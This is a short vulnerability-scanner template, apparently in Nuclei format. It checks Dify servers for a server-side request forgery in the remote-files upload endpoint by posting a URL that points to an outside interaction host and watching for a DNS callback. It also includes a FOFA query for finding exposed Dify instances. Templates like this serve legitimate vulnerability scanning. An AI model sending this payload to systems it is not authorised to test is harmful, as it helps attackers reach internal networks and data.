http:
    - matchers:
        - part: interactsh_protocol
          type: word
          words:
            - dns
      raw:
        - |
          POST /console/api/remote-files/upload HTTP/1.1
          Host: {{Hostname}}
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36
          Content-Type: application/json

          {"url":"http://{{interactsh-url}}"}
id: dify-upload-SSRF
info:
    author: Superhero
    description: |-
        fofa: app="Dify"
        SSRF（Server-Side Request Forgery，服务器端请求伪造）是一种由攻击者构造请求，利用服务器漏洞以服务端身份向内网发送请求的攻击方式。攻击者通过伪造请求内容，使服务器向指定目标发起未经授权的访问，通常用于获取内网敏感信息或资源。
    name: dify upload ssrf漏洞
    reference:
        - https://mp.weixin.qq.com/s/Pww8EsO6qprKIGZ4SWVbIA
    severity: high
    tags:
        - SSRF
